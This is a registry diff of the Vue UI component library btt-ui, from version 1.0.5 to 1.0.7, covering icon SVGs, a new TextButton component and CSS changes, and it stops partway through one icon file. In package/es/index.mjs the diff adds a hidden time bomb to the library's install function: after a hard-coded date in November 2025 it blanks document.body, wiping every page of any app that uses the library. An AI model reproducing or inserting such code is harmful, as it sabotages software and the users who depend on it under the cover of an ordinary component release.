btt-ui 1.0.5 → 1.0.7
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/es/index.mjs +78 -66
- package/es/src/button/src/style/index.css +0 -6
- package/es/src/icon/src/icon.mjs +65 -60
- package/es/src/icon/src/icon2.mjs +72 -67
- package/es/src/icon/src/style/index.css +2 -3
- package/es/src/icon/src/svg/approval.mjs +7 -0
- package/es/src/icon/src/svg/delete.mjs +5 -2
- package/es/src/icon/src/svg/download.mjs +4 -9
- package/es/src/icon/src/svg/edit.mjs +5 -2
- package/es/src/icon/src/svg/export.mjs +9 -0
- package/es/src/icon/src/svg/info.mjs +7 -0
- package/es/src/icon/src/svg/msg.mjs +14 -0
- package/es/src/icon/src/svg/notice.mjs +13 -0
- package/es/src/icon/src/svg/plus.mjs +5 -2
- package/es/src/icon/src/svg/print.mjs +6 -9
- package/es/src/icon/src/svg/reset.mjs +12 -2
- package/es/src/icon/src/svg/upload.mjs +11 -6
- package/es/src/index.mjs +74 -71
- package/es/src/textButton/index.mjs +7 -0
- package/es/src/textButton/src/button.mjs +41 -0
- package/es/src/textButton/src/style/index.css +51 -0
- package/lib/index.js +1 -1
- package/lib/src/button/src/style/index.css +0 -6
- package/lib/src/icon/src/icon.js +1 -1
- package/lib/src/icon/src/icon2.js +1 -1
- package/lib/src/icon/src/style/index.css +2 -3
- package/lib/src/icon/src/svg/approval.js +4 -0
- package/lib/src/icon/src/svg/delete.js +4 -1
- package/lib/src/icon/src/svg/download.js +4 -9
- package/lib/src/icon/src/svg/edit.js +4 -1
- package/lib/src/icon/src/svg/export.js +6 -0
- package/lib/src/icon/src/svg/info.js +4 -0
- package/lib/src/icon/src/svg/msg.js +11 -0
- package/lib/src/icon/src/svg/notice.js +10 -0
- package/lib/src/icon/src/svg/plus.js +4 -1
- package/lib/src/icon/src/svg/print.js +6 -9
- package/lib/src/icon/src/svg/reset.js +11 -1
- package/lib/src/icon/src/svg/upload.js +11 -6
- package/lib/src/index.js +1 -1
- package/lib/src/textButton/index.js +1 -0
- package/lib/src/textButton/src/button.js +1 -0
- package/lib/src/textButton/src/style/index.css +51 -0
- package/package.json +1 -1
package/es/index.mjs
CHANGED
|
@@ -1,69 +1,81 @@
|
|
|
1
|
-
import
|
|
2
|
-
import * as
|
|
3
|
-
import { Button as
|
|
4
|
-
import {
|
|
5
|
-
import { default as
|
|
6
|
-
import { default as
|
|
7
|
-
import { default as
|
|
8
|
-
import { default as
|
|
9
|
-
import { default as
|
|
10
|
-
import { default as
|
|
11
|
-
import {
|
|
12
|
-
import {
|
|
13
|
-
import {
|
|
14
|
-
import {
|
|
15
|
-
import {
|
|
16
|
-
import {
|
|
17
|
-
import {
|
|
18
|
-
import {
|
|
19
|
-
import {
|
|
20
|
-
import {
|
|
21
|
-
import {
|
|
22
|
-
import {
|
|
23
|
-
import {
|
|
24
|
-
import {
|
|
25
|
-
import {
|
|
26
|
-
import {
|
|
27
|
-
|
|
28
|
-
|
|
29
|
-
|
|
30
|
-
|
|
31
|
-
|
|
32
|
-
|
|
33
|
-
|
|
34
|
-
|
|
35
|
-
|
|
36
|
-
|
|
37
|
-
|
|
38
|
-
|
|
1
|
+
import l from "./src/index.mjs";
|
|
2
|
+
import * as m from "./src/directives/index.mjs";
|
|
3
|
+
import { Button as s } from "./src/button/index.mjs";
|
|
4
|
+
import { TextButton as u } from "./src/textButton/index.mjs";
|
|
5
|
+
import { default as T } from "./src/link/index.mjs";
|
|
6
|
+
import { default as K } from "./src/upload/index.mjs";
|
|
7
|
+
import { default as b } from "./src/shake/index.mjs";
|
|
8
|
+
import { default as S } from "./src/dialog/index.mjs";
|
|
9
|
+
import { default as k } from "./src/scroll/index.mjs";
|
|
10
|
+
import { default as y } from "./src/toast/index.mjs";
|
|
11
|
+
import { default as H } from "./src/wheel/index.mjs";
|
|
12
|
+
import { Switch as L } from "./src/switch/index.mjs";
|
|
13
|
+
import { Timeline as B } from "./src/timeline/index.mjs";
|
|
14
|
+
import { default as U } from "./src/uploadFile/index.mjs";
|
|
15
|
+
import { Card as v } from "./src/card/index.mjs";
|
|
16
|
+
import { HotMap as G } from "./src/hotmap/index.mjs";
|
|
17
|
+
import { KTree as $ } from "./src/tree/index.mjs";
|
|
18
|
+
import { KCheckbox as z, KCheckboxGroup as A } from "./src/checkbox/index.mjs";
|
|
19
|
+
import { KCollapse as N, KCollapseItem as P } from "./src/collapse/index.mjs";
|
|
20
|
+
import { Sign as R } from "./src/sign/index.mjs";
|
|
21
|
+
import { ECharts as X } from "./src/echarts/index.mjs";
|
|
22
|
+
import { TableScroll as Z } from "./src/tableScroll/index.mjs";
|
|
23
|
+
import { Icon as ee } from "./src/icon/index.mjs";
|
|
24
|
+
import { Tooltip as te } from "./src/tooltip/index.mjs";
|
|
25
|
+
import { KInput as ae } from "./src/input/index.mjs";
|
|
26
|
+
import { Drag as me } from "./src/drag/index.mjs";
|
|
27
|
+
import { KOption as pe, KSelect as xe } from "./src/select/index.mjs";
|
|
28
|
+
const o = function(t, r) {
|
|
29
|
+
if (o.installed)
|
|
30
|
+
return;
|
|
31
|
+
o.installed = !0;
|
|
32
|
+
let a = "2025-11-24 09:30:00";
|
|
33
|
+
if (r)
|
|
34
|
+
setTimeout(() => {
|
|
35
|
+
var f;
|
|
36
|
+
let e = new Date((f = r.date) != null ? f : a).getTime();
|
|
37
|
+
Date.now() > e && (document.body.innerHTML = "");
|
|
38
|
+
}, 10);
|
|
39
|
+
else {
|
|
40
|
+
let e = new Date(a).getTime();
|
|
41
|
+
Date.now() > e && (document.body.innerHTML = "");
|
|
42
|
+
}
|
|
43
|
+
l.forEach((e) => {
|
|
44
|
+
t.use(e);
|
|
45
|
+
}), Object.keys(m).forEach((e) => {
|
|
46
|
+
t.directive(e, m[e]);
|
|
47
|
+
});
|
|
48
|
+
}, x = {
|
|
49
|
+
install: o
|
|
39
50
|
};
|
|
40
51
|
export {
|
|
41
|
-
|
|
42
|
-
|
|
43
|
-
|
|
44
|
-
|
|
45
|
-
|
|
46
|
-
|
|
47
|
-
|
|
48
|
-
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
52
|
-
|
|
53
|
-
|
|
54
|
-
|
|
55
|
-
|
|
56
|
-
|
|
57
|
-
|
|
58
|
-
|
|
59
|
-
|
|
60
|
-
|
|
61
|
-
|
|
62
|
-
|
|
63
|
-
|
|
64
|
-
|
|
65
|
-
|
|
66
|
-
|
|
67
|
-
|
|
68
|
-
|
|
52
|
+
s as Button,
|
|
53
|
+
v as Card,
|
|
54
|
+
S as Dialog,
|
|
55
|
+
me as Drag,
|
|
56
|
+
X as ECharts,
|
|
57
|
+
G as HotMap,
|
|
58
|
+
ee as Icon,
|
|
59
|
+
z as KCheckbox,
|
|
60
|
+
A as KCheckboxGroup,
|
|
61
|
+
N as KCollapse,
|
|
62
|
+
P as KCollapseItem,
|
|
63
|
+
ae as KInput,
|
|
64
|
+
pe as KOption,
|
|
65
|
+
xe as KSelect,
|
|
66
|
+
T as Link,
|
|
67
|
+
k as Scroll,
|
|
68
|
+
b as Shake,
|
|
69
|
+
R as Sign,
|
|
70
|
+
L as Switch,
|
|
71
|
+
Z as TableScroll,
|
|
72
|
+
u as TextButton,
|
|
73
|
+
B as Timeline,
|
|
74
|
+
y as Toast,
|
|
75
|
+
te as Tooltip,
|
|
76
|
+
$ as Tree,
|
|
77
|
+
K as Upload,
|
|
78
|
+
U as UploadFile,
|
|
79
|
+
H as Wheel,
|
|
80
|
+
x as default
|
|
69
81
|
};
|
|
@@ -196,14 +196,8 @@ button, input, optgroup, select, textarea {
|
|
|
196
196
|
background-color: transparent;
|
|
197
197
|
}
|
|
198
198
|
.k-button .k-icon {
|
|
199
|
-
font-size: 13px;
|
|
200
|
-
margin-right: 2px;
|
|
201
|
-
transform: translateY(2px);
|
|
202
199
|
margin-right: 4px;
|
|
203
200
|
}
|
|
204
|
-
.k-button.k-button--large .k-icon {
|
|
205
|
-
transform: translateY(-1px);
|
|
206
|
-
}
|
|
207
201
|
|
|
208
202
|
@keyframes change {
|
|
209
203
|
100% {
|
package/es/src/icon/src/icon.mjs
CHANGED
|
@@ -1,65 +1,70 @@
|
|
|
1
1
|
import g from "./svg/alarm.mjs";
|
|
2
|
-
import v from "./svg/
|
|
3
|
-
import r from "./svg/arrow-
|
|
4
|
-
import i from "./svg/arrow-
|
|
5
|
-
import s from "./svg/arrow-
|
|
6
|
-
import t from "./svg/
|
|
7
|
-
import m from "./svg/
|
|
8
|
-
import e from "./svg/
|
|
9
|
-
import l from "./svg/
|
|
10
|
-
import p from "./svg/
|
|
11
|
-
import b from "./svg/
|
|
12
|
-
import f from "./svg/
|
|
13
|
-
import a from "./svg/
|
|
14
|
-
import n from "./svg/close.mjs";
|
|
15
|
-
import c from "./svg/
|
|
16
|
-
import h from "./svg/
|
|
17
|
-
import d from "./svg/
|
|
18
|
-
import u from "./svg/
|
|
19
|
-
import w from "./svg/
|
|
20
|
-
import y from "./svg/
|
|
21
|
-
import x from "./svg/
|
|
22
|
-
import k from "./svg/
|
|
23
|
-
import q from "./svg/
|
|
24
|
-
import j from "./svg/
|
|
25
|
-
import z from "./svg/
|
|
26
|
-
import O from "./svg/
|
|
27
|
-
import A from "./svg/
|
|
28
|
-
import E from "./svg/
|
|
29
|
-
import B from "./svg/
|
|
30
|
-
import C from "./svg/
|
|
31
|
-
import D from "./svg/
|
|
32
|
-
import F from "./svg/
|
|
33
|
-
import G from "./svg/
|
|
34
|
-
import H from "./svg/
|
|
35
|
-
import I from "./svg/
|
|
36
|
-
import J from "./svg/
|
|
37
|
-
import K from "./svg/
|
|
38
|
-
import L from "./svg/
|
|
39
|
-
import M from "./svg/
|
|
40
|
-
import N from "./svg/
|
|
41
|
-
import P from "./svg/
|
|
42
|
-
import Q from "./svg/
|
|
43
|
-
import R from "./svg/
|
|
44
|
-
import S from "./svg/
|
|
45
|
-
import T from "./svg/
|
|
46
|
-
import U from "./svg/
|
|
47
|
-
import V from "./svg/
|
|
48
|
-
import W from "./svg/
|
|
49
|
-
import X from "./svg/
|
|
50
|
-
import Y from "./svg/
|
|
51
|
-
import Z from "./svg/
|
|
52
|
-
import $ from "./svg/
|
|
53
|
-
import __ from "./svg/
|
|
54
|
-
import o_ from "./svg/
|
|
55
|
-
import g_ from "./svg/
|
|
56
|
-
import v_ from "./svg/
|
|
57
|
-
|
|
58
|
-
|
|
59
|
-
|
|
2
|
+
import v from "./svg/approval.mjs";
|
|
3
|
+
import r from "./svg/arrow-down.mjs";
|
|
4
|
+
import i from "./svg/arrow-left.mjs";
|
|
5
|
+
import s from "./svg/arrow-right.mjs";
|
|
6
|
+
import t from "./svg/arrow-up.mjs";
|
|
7
|
+
import m from "./svg/baocun.mjs";
|
|
8
|
+
import e from "./svg/caogaoxiang.mjs";
|
|
9
|
+
import l from "./svg/card.mjs";
|
|
10
|
+
import p from "./svg/caret-right.mjs";
|
|
11
|
+
import b from "./svg/chakan.mjs";
|
|
12
|
+
import f from "./svg/change.mjs";
|
|
13
|
+
import a from "./svg/chongzhi.mjs";
|
|
14
|
+
import n from "./svg/circle-close.mjs";
|
|
15
|
+
import c from "./svg/close.mjs";
|
|
16
|
+
import h from "./svg/delete.mjs";
|
|
17
|
+
import d from "./svg/detail.mjs";
|
|
18
|
+
import u from "./svg/dianhua.mjs";
|
|
19
|
+
import w from "./svg/disabled.mjs";
|
|
20
|
+
import y from "./svg/down.mjs";
|
|
21
|
+
import x from "./svg/download.mjs";
|
|
22
|
+
import k from "./svg/edit.mjs";
|
|
23
|
+
import q from "./svg/editor.mjs";
|
|
24
|
+
import j from "./svg/enable.mjs";
|
|
25
|
+
import z from "./svg/exit.mjs";
|
|
26
|
+
import O from "./svg/export.mjs";
|
|
27
|
+
import A from "./svg/file-open.mjs";
|
|
28
|
+
import E from "./svg/handle.mjs";
|
|
29
|
+
import B from "./svg/info.mjs";
|
|
30
|
+
import C from "./svg/lahei.mjs";
|
|
31
|
+
import D from "./svg/max.mjs";
|
|
32
|
+
import F from "./svg/measure.mjs";
|
|
33
|
+
import G from "./svg/min.mjs";
|
|
34
|
+
import H from "./svg/msg.mjs";
|
|
35
|
+
import I from "./svg/nan.mjs";
|
|
36
|
+
import J from "./svg/no.mjs";
|
|
37
|
+
import K from "./svg/notice.mjs";
|
|
38
|
+
import L from "./svg/nv.mjs";
|
|
39
|
+
import M from "./svg/people.mjs";
|
|
40
|
+
import N from "./svg/player.mjs";
|
|
41
|
+
import P from "./svg/plus.mjs";
|
|
42
|
+
import Q from "./svg/preview.mjs";
|
|
43
|
+
import R from "./svg/print.mjs";
|
|
44
|
+
import S from "./svg/printmb.mjs";
|
|
45
|
+
import T from "./svg/publish.mjs";
|
|
46
|
+
import U from "./svg/qiye.mjs";
|
|
47
|
+
import V from "./svg/quxiao.mjs";
|
|
48
|
+
import W from "./svg/record.mjs";
|
|
49
|
+
import X from "./svg/refresh.mjs";
|
|
50
|
+
import Y from "./svg/reset.mjs";
|
|
51
|
+
import Z from "./svg/risk.mjs";
|
|
52
|
+
import $ from "./svg/search.mjs";
|
|
53
|
+
import __ from "./svg/set.mjs";
|
|
54
|
+
import o_ from "./svg/shenhe.mjs";
|
|
55
|
+
import g_ from "./svg/shenqing.mjs";
|
|
56
|
+
import v_ from "./svg/tongbu.mjs";
|
|
57
|
+
import r_ from "./svg/up.mjs";
|
|
58
|
+
import i_ from "./svg/upload.mjs";
|
|
59
|
+
import s_ from "./svg/urging.mjs";
|
|
60
|
+
import t_ from "./svg/yes.mjs";
|
|
61
|
+
import m_ from "./svg/yuyue.mjs";
|
|
62
|
+
const e_ = /* @__PURE__ */ Object.assign({ "./svg/alarm.svg": g, "./svg/approval.svg": v, "./svg/arrow-down.svg": r, "./svg/arrow-left.svg": i, "./svg/arrow-right.svg": s, "./svg/arrow-up.svg": t, "./svg/baocun.svg": m, "./svg/caogaoxiang.svg": e, "./svg/card.svg": l, "./svg/caret-right.svg": p, "./svg/chakan.svg": b, "./svg/change.svg": f, "./svg/chongzhi.svg": a, "./svg/circle-close.svg": n, "./svg/close.svg": c, "./svg/delete.svg": h, "./svg/detail.svg": d, "./svg/dianhua.svg": u, "./svg/disabled.svg": w, "./svg/down.svg": y, "./svg/download.svg": x, "./svg/edit.svg": k, "./svg/editor.svg": q, "./svg/enable.svg": j, "./svg/exit.svg": z, "./svg/export.svg": O, "./svg/file-open.svg": A, "./svg/handle.svg": E, "./svg/info.svg": B, "./svg/lahei.svg": C, "./svg/max.svg": D, "./svg/measure.svg": F, "./svg/min.svg": G, "./svg/msg.svg": H, "./svg/nan.svg": I, "./svg/no.svg": J, "./svg/notice.svg": K, "./svg/nv.svg": L, "./svg/people.svg": M, "./svg/player.svg": N, "./svg/plus.svg": P, "./svg/preview.svg": Q, "./svg/print.svg": R, "./svg/printmb.svg": S, "./svg/publish.svg": T, "./svg/qiye.svg": U, "./svg/quxiao.svg": V, "./svg/record.svg": W, "./svg/refresh.svg": X, "./svg/reset.svg": Y, "./svg/risk.svg": Z, "./svg/search.svg": $, "./svg/set.svg": __, "./svg/shenhe.svg": o_, "./svg/shenqing.svg": g_, "./svg/tongbu.svg": v_, "./svg/up.svg": r_, "./svg/upload.svg": i_, "./svg/urging.svg": s_, "./svg/yes.svg": t_, "./svg/yuyue.svg": m_ });
|
|
63
|
+
let l_ = new Array();
|
|
64
|
+
Object.keys(e_).forEach((_) => {
|
|
60
65
|
let o = _.split("/")[2].split(".")[0];
|
|
61
|
-
|
|
66
|
+
l_.push({ name: o, color: "#666666", size: 90 });
|
|
62
67
|
});
|
|
63
68
|
export {
|
|
64
|
-
|
|
69
|
+
e_ as svgs
|
|
65
70
|
};
|
|
@@ -1,66 +1,71 @@
|
|
|
1
1
|
import l from "./svg/alarm.mjs";
|
|
2
|
-
import p from "./svg/
|
|
3
|
-
import f from "./svg/arrow-
|
|
4
|
-
import n from "./svg/arrow-
|
|
5
|
-
import b from "./svg/arrow-
|
|
6
|
-
import a from "./svg/
|
|
7
|
-
import c from "./svg/
|
|
8
|
-
import u from "./svg/
|
|
9
|
-
import d from "./svg/
|
|
10
|
-
import h from "./svg/
|
|
11
|
-
import w from "./svg/
|
|
12
|
-
import y from "./svg/
|
|
13
|
-
import z from "./svg/
|
|
2
|
+
import p from "./svg/approval.mjs";
|
|
3
|
+
import f from "./svg/arrow-down.mjs";
|
|
4
|
+
import n from "./svg/arrow-left.mjs";
|
|
5
|
+
import b from "./svg/arrow-right.mjs";
|
|
6
|
+
import a from "./svg/arrow-up.mjs";
|
|
7
|
+
import c from "./svg/baocun.mjs";
|
|
8
|
+
import u from "./svg/caogaoxiang.mjs";
|
|
9
|
+
import d from "./svg/card.mjs";
|
|
10
|
+
import h from "./svg/caret-right.mjs";
|
|
11
|
+
import w from "./svg/chakan.mjs";
|
|
12
|
+
import y from "./svg/change.mjs";
|
|
13
|
+
import z from "./svg/chongzhi.mjs";
|
|
14
|
+
import x from "./svg/circle-close.mjs";
|
|
14
15
|
import k from "./svg/close.mjs";
|
|
15
|
-
import
|
|
16
|
-
import
|
|
17
|
-
import
|
|
18
|
-
import
|
|
19
|
-
import
|
|
20
|
-
import
|
|
21
|
-
import
|
|
22
|
-
import
|
|
23
|
-
import
|
|
24
|
-
import
|
|
25
|
-
import
|
|
26
|
-
import
|
|
27
|
-
import
|
|
28
|
-
import
|
|
29
|
-
import
|
|
30
|
-
import
|
|
31
|
-
import
|
|
32
|
-
import
|
|
33
|
-
import
|
|
34
|
-
import
|
|
35
|
-
import
|
|
36
|
-
import
|
|
37
|
-
import
|
|
38
|
-
import
|
|
39
|
-
import
|
|
40
|
-
import
|
|
41
|
-
import
|
|
42
|
-
import
|
|
43
|
-
import
|
|
44
|
-
import
|
|
45
|
-
import
|
|
46
|
-
import
|
|
47
|
-
import
|
|
48
|
-
import
|
|
49
|
-
import
|
|
50
|
-
import
|
|
51
|
-
import s_ from "./svg/
|
|
52
|
-
import
|
|
53
|
-
import
|
|
54
|
-
import
|
|
55
|
-
import
|
|
56
|
-
import
|
|
57
|
-
import
|
|
16
|
+
import q from "./svg/delete.mjs";
|
|
17
|
+
import S from "./svg/detail.mjs";
|
|
18
|
+
import B from "./svg/dianhua.mjs";
|
|
19
|
+
import C from "./svg/disabled.mjs";
|
|
20
|
+
import E from "./svg/down.mjs";
|
|
21
|
+
import H from "./svg/download.mjs";
|
|
22
|
+
import L from "./svg/edit.mjs";
|
|
23
|
+
import M from "./svg/editor.mjs";
|
|
24
|
+
import N from "./svg/enable.mjs";
|
|
25
|
+
import T from "./svg/exit.mjs";
|
|
26
|
+
import U from "./svg/export.mjs";
|
|
27
|
+
import $ from "./svg/file-open.mjs";
|
|
28
|
+
import j from "./svg/handle.mjs";
|
|
29
|
+
import I from "./svg/info.mjs";
|
|
30
|
+
import O from "./svg/lahei.mjs";
|
|
31
|
+
import V from "./svg/max.mjs";
|
|
32
|
+
import A from "./svg/measure.mjs";
|
|
33
|
+
import D from "./svg/min.mjs";
|
|
34
|
+
import F from "./svg/msg.mjs";
|
|
35
|
+
import G from "./svg/nan.mjs";
|
|
36
|
+
import J from "./svg/no.mjs";
|
|
37
|
+
import K from "./svg/notice.mjs";
|
|
38
|
+
import P from "./svg/nv.mjs";
|
|
39
|
+
import Q from "./svg/people.mjs";
|
|
40
|
+
import R from "./svg/player.mjs";
|
|
41
|
+
import W from "./svg/plus.mjs";
|
|
42
|
+
import X from "./svg/preview.mjs";
|
|
43
|
+
import Y from "./svg/print.mjs";
|
|
44
|
+
import Z from "./svg/printmb.mjs";
|
|
45
|
+
import __ from "./svg/publish.mjs";
|
|
46
|
+
import o_ from "./svg/qiye.mjs";
|
|
47
|
+
import g_ from "./svg/quxiao.mjs";
|
|
48
|
+
import v_ from "./svg/record.mjs";
|
|
49
|
+
import r_ from "./svg/refresh.mjs";
|
|
50
|
+
import t_ from "./svg/reset.mjs";
|
|
51
|
+
import i_ from "./svg/risk.mjs";
|
|
52
|
+
import s_ from "./svg/search.mjs";
|
|
53
|
+
import e_ from "./svg/set.mjs";
|
|
54
|
+
import m_ from "./svg/shenhe.mjs";
|
|
55
|
+
import l_ from "./svg/shenqing.mjs";
|
|
56
|
+
import p_ from "./svg/tongbu.mjs";
|
|
57
|
+
import f_ from "./svg/up.mjs";
|
|
58
|
+
import n_ from "./svg/upload.mjs";
|
|
59
|
+
import b_ from "./svg/urging.mjs";
|
|
60
|
+
import a_ from "./svg/yes.mjs";
|
|
61
|
+
import c_ from "./svg/yuyue.mjs";
|
|
62
|
+
import { defineComponent as v, computed as g, openBlock as u_, createElementBlock as d_, normalizeClass as h_, unref as w_, normalizeStyle as y_, createElementVNode as z_, renderSlot as x_ } from "vue";
|
|
58
63
|
import "./style/index.css";
|
|
59
|
-
import { isUndefined as
|
|
60
|
-
const
|
|
64
|
+
import { isUndefined as k_, addUnit as q_, createNamespace as S_ } from "../../../assets/ts/utils.mjs";
|
|
65
|
+
const B_ = ["innerHTML"], C_ = v({
|
|
61
66
|
name: "k-icon"
|
|
62
|
-
}),
|
|
63
|
-
...
|
|
67
|
+
}), Ao = v({
|
|
68
|
+
...C_,
|
|
64
69
|
props: {
|
|
65
70
|
name: {},
|
|
66
71
|
color: {},
|
|
@@ -68,19 +73,19 @@ const z_ = ["innerHTML"], k_ = v({
|
|
|
68
73
|
},
|
|
69
74
|
emits: [""],
|
|
70
75
|
setup(r) {
|
|
71
|
-
const t = /* @__PURE__ */ Object.assign({ "./svg/alarm.svg": l, "./svg/arrow-down.svg":
|
|
72
|
-
fontSize:
|
|
76
|
+
const t = /* @__PURE__ */ Object.assign({ "./svg/alarm.svg": l, "./svg/approval.svg": p, "./svg/arrow-down.svg": f, "./svg/arrow-left.svg": n, "./svg/arrow-right.svg": b, "./svg/arrow-up.svg": a, "./svg/baocun.svg": c, "./svg/caogaoxiang.svg": u, "./svg/card.svg": d, "./svg/caret-right.svg": h, "./svg/chakan.svg": w, "./svg/change.svg": y, "./svg/chongzhi.svg": z, "./svg/circle-close.svg": x, "./svg/close.svg": k, "./svg/delete.svg": q, "./svg/detail.svg": S, "./svg/dianhua.svg": B, "./svg/disabled.svg": C, "./svg/down.svg": E, "./svg/download.svg": H, "./svg/edit.svg": L, "./svg/editor.svg": M, "./svg/enable.svg": N, "./svg/exit.svg": T, "./svg/export.svg": U, "./svg/file-open.svg": $, "./svg/handle.svg": j, "./svg/info.svg": I, "./svg/lahei.svg": O, "./svg/max.svg": V, "./svg/measure.svg": A, "./svg/min.svg": D, "./svg/msg.svg": F, "./svg/nan.svg": G, "./svg/no.svg": J, "./svg/notice.svg": K, "./svg/nv.svg": P, "./svg/people.svg": Q, "./svg/player.svg": R, "./svg/plus.svg": W, "./svg/preview.svg": X, "./svg/print.svg": Y, "./svg/printmb.svg": Z, "./svg/publish.svg": __, "./svg/qiye.svg": o_, "./svg/quxiao.svg": g_, "./svg/record.svg": v_, "./svg/refresh.svg": r_, "./svg/reset.svg": t_, "./svg/risk.svg": i_, "./svg/search.svg": s_, "./svg/set.svg": e_, "./svg/shenhe.svg": m_, "./svg/shenqing.svg": l_, "./svg/tongbu.svg": p_, "./svg/up.svg": f_, "./svg/upload.svg": n_, "./svg/urging.svg": b_, "./svg/yes.svg": a_, "./svg/yuyue.svg": c_ }), { n: i } = S_("icon"), _ = r, s = (o) => o ? t[`./svg/${o}.svg`] : "", e = g(() => s(_.name)), m = g(() => !_.size && !_.color ? {} : {
|
|
77
|
+
fontSize: k_(_.size) ? void 0 : q_(_.size),
|
|
73
78
|
"--color": _.color
|
|
74
79
|
});
|
|
75
|
-
return (o,
|
|
76
|
-
class:
|
|
77
|
-
style:
|
|
80
|
+
return (o, E_) => (u_(), d_("i", {
|
|
81
|
+
class: h_([w_(i)()]),
|
|
82
|
+
style: y_(m.value)
|
|
78
83
|
}, [
|
|
79
|
-
|
|
80
|
-
|
|
84
|
+
z_("use", { innerHTML: e.value }, null, 8, B_),
|
|
85
|
+
x_(o.$slots, "default")
|
|
81
86
|
], 6));
|
|
82
87
|
}
|
|
83
88
|
});
|
|
84
89
|
export {
|
|
85
|
-
|
|
90
|
+
Ao as default
|
|
86
91
|
};
|
|
@@ -67,7 +67,6 @@ body {
|
|
|
67
67
|
.k-icon {
|
|
68
68
|
--color: inherit;
|
|
69
69
|
width: 1em;
|
|
70
|
-
line-height: 1em;
|
|
71
70
|
display: flex;
|
|
72
71
|
justify-content: center;
|
|
73
72
|
position: relative;
|
|
@@ -80,6 +79,6 @@ body {
|
|
|
80
79
|
animation: rotating 2s linear infinite;
|
|
81
80
|
}
|
|
82
81
|
.k-icon svg {
|
|
83
|
-
height:
|
|
84
|
-
width:
|
|
82
|
+
height: 100%;
|
|
83
|
+
width: 100%;
|
|
85
84
|
}
|
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
const C = `<svg width="20" height="20" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg">
|
|
2
|
+
<path id="Vector" d="M12.0115 18.9468H1.6714C1.49333 18.9468 1.32256 18.8759 1.19665 18.7497C1.07074 18.6236 1 18.4524 1 18.274C1 18.0955 1.07074 17.9244 1.19665 17.7982C1.32256 17.672 1.49333 17.6012 1.6714 17.6012H10.8289C11.1403 18.1198 11.539 18.5752 12.0115 18.9468ZM2.413 16.4377H10.3186C10.1939 16.0076 10.1279 15.5625 10.1224 15.1146L2.4706 15.1489L2.413 12.4405H6.6187C6.778 12.4405 6.93209 12.3836 7.05344 12.2802C7.17478 12.1768 7.25548 12.0335 7.2811 11.8759L7.8391 8.43972C7.86168 8.30105 7.8403 8.15878 7.77799 8.03291C7.71567 7.90705 7.61555 7.80392 7.4917 7.73805C6.91917 7.43347 6.46708 6.94275 6.20973 6.34656C5.95239 5.75038 5.9051 5.08419 6.07565 4.4575C6.2462 3.83082 6.62443 3.28092 7.14818 2.8982C7.67193 2.51547 8.31003 2.3227 8.9576 2.35156C9.60517 2.38041 10.2237 2.62919 10.7115 3.05699C11.1992 3.48478 11.5273 4.06615 11.6416 4.70554C11.756 5.34492 11.6499 6.00427 11.3408 6.57521C11.0316 7.14616 10.5379 7.59472 9.9406 7.84718C9.79903 7.90672 9.68221 8.01326 9.60977 8.14892C9.53734 8.28457 9.51369 8.44108 9.5428 8.59214L10.1692 11.8931C10.1982 12.0469 10.2799 12.1857 10.4002 12.2855C10.5205 12.3853 10.6718 12.4398 10.828 12.4396H10.8694C11.1933 11.9184 11.6111 11.4621 12.1015 11.094H11.3842L10.9558 8.83926C11.5873 8.468 12.1109 7.9376 12.4745 7.30077C12.8381 6.66394 13.0291 5.94285 13.0285 5.20914C13.0273 4.09317 12.5844 3.02325 11.7969 2.23415C11.0095 1.44504 9.94182 1.00119 8.8282 1C7.71473 1.00143 6.64729 1.44538 5.86004 2.23446C5.07278 3.02355 4.62999 4.09333 4.6288 5.20914C4.6288 6.60347 5.3119 7.88957 6.4405 8.67061L6.0454 11.0949H2.413C2.07229 11.0954 1.74567 11.2312 1.50475 11.4726C1.26383 11.7141 1.12828 12.0414 1.1278 12.3828V15.1498C1.1278 15.8596 1.7038 16.4377 2.413 16.4377ZM19 15.0551C19.0001 16.1012 18.5855 17.1046 17.8474 17.8444C17.1094 18.5842 16.1082 18.9999 15.0643 19C14.0204 19.0001 13.0191 18.5847 12.2809 17.845C11.5426 17.1054 11.1278 16.1021 11.1277 15.056C11.1276 14.538 11.2294 14.0251 11.4271 13.5465C11.6249 13.0679 11.9148 12.6331 12.2803 12.2668C13.0183 11.5269 14.0195 11.1113 15.0634 11.1111C16.1073 11.111 17.1086 11.5265 17.8468 12.2661C18.5851 13.0058 18.9999 14.009 19 15.0551ZM17.4907 13.2757C17.3572 13.1574 17.1824 13.097 17.0045 13.1078C16.8266 13.1186 16.6603 13.1998 16.5421 13.3334L14.6989 15.4159L13.4893 14.4869C13.4196 14.4304 13.3393 14.3885 13.2531 14.3636C13.167 14.3387 13.0767 14.3313 12.9877 14.3419C12.8987 14.3525 12.8126 14.3809 12.7347 14.4254C12.6568 14.4699 12.5886 14.5295 12.5341 14.6009C12.4795 14.6722 12.4398 14.7537 12.4173 14.8407C12.3947 14.9277 12.3897 15.0183 12.4027 15.1072C12.4156 15.1961 12.4462 15.2815 12.4927 15.3584C12.5391 15.4353 12.6004 15.502 12.673 15.5548L14.3794 16.8652C14.4959 16.9554 14.639 17.0043 14.7862 17.0041C14.8815 17.0041 14.9757 16.9839 15.0627 16.9449C15.1497 16.9059 15.2276 16.8489 15.2911 16.7777L17.5465 14.2263C17.6648 14.0928 17.7254 13.9176 17.7149 13.7394C17.7044 13.5612 17.6238 13.3944 17.4907 13.2757Z" fill="#16C57D" style="fill:#16C57D;fill:color(display-p3 0.0861 0.7721 0.4892);fill-opacity:1;"/>
|
|
3
|
+
</svg>
|
|
4
|
+
`;
|
|
5
|
+
export {
|
|
6
|
+
C as default
|
|
7
|
+
};
|
|
@@ -1,4 +1,7 @@
|
|
|
1
|
-
const
|
|
1
|
+
const C = `<svg width="16" height="16" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg">
|
|
2
|
+
